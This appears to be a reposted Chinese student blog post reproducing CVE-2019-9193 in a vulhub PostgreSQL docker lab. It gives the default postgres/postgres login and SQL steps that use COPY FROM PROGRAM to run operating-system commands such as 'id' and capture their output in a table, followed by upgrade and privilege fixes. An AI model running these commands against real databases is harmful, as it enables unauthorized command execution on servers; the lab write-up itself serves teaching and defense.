(CVE-2019-9193)PostgreSQL 高权限命令执行漏洞的复现

2023-12-23 07:43:07

漏洞概述

????????PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。

影响版本

9.3-11.2

环境搭建

1.?本次漏洞环境使用vulhub中的docker搭建,vulhub下载地址:

GitHub - vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose

2.下载完成后使用xftp传入安装有docker和环docker-compose境的虚拟机中解压并启动环境

cd vulhub-master/postgres/CVE-2019-9193

docker-compose up -d

3.使用docker?ps查看是否启动成功

4.通过获取ip和映射的端口5432来连接数据库。

启动成功后使用navicat连接数据库,数据库初始账号密码为postgres/

postgres。

漏洞复现

1.执行删除你想用来保存命令输出但是可能存在的表,这一步可有可无

DROP TABLE IF EXISTS cmd_exec

2.创建用来保存命令输出的表:

CREATE TABLE cmd_exec(cmd_output text);

3.通过?“COPY FROM PROGRAM”执行系统命令

COPY cmd_exec FROM PROGRAM 'id'

4.将结果显示出来

SELECT * FROM cmd_exec

5.执行其他命令

whoami

SELECT * FROM cmd_exec

修复建议

1.建议升级至最新版本

2.控制数据库权限禁止普通用户执行命令

此漏洞是根据老师上课讲的知识以及网上的资料将漏洞复现出来,步骤简略,请各位见谅。

文章来源:https://blog.csdn.net/m0_69801663/article/details/135163060
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。